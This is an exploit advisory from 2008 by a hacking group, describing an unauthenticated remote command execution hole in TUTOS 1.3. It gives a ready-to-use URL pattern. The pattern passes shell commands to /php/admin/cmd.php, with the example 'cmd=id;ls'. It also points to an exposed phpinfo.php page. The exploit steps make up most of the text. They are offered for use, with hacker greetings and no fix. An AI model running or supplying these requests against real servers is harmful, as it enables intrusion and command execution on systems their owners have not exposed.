TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability

2008-01-07 00:00:00

######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350} #
# HOME : http://no-hack.net #
# Script : TUTOS (Tested in version 1.3) other versions may also be affected. #
# Download : http://www.tutos.org/homepage/index.html #
# BUG : Command Execution Vulnerability #
######################################################################################

(~)| 3xpl0it4t10n

-1- : Command Execution

http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php?cmd=[your command]

>> we dont need a permission admin for access to '/php/admin/cmd.php' :d

exemple : http://site.com/tutos/php/admin/cmd.php?cmd=id;ls

or we can just enter into : http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php
and right the command in [ CMD(*) ] and press enter :d

-2- Get phpinfo

http://[TARGEt]/[path_TUTOS]/php/admin/phpinfo.php

(~)| Explantion By Video :
http://no-hack.net/video/tutos.zip


# greezt : CoNaN , GoLd_M , RoMaNcYxHaCkEr , and all muslims Hackers

######################################################################################
# H-T TeaM {HouSSaMix _ ToXiC350} #
######################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.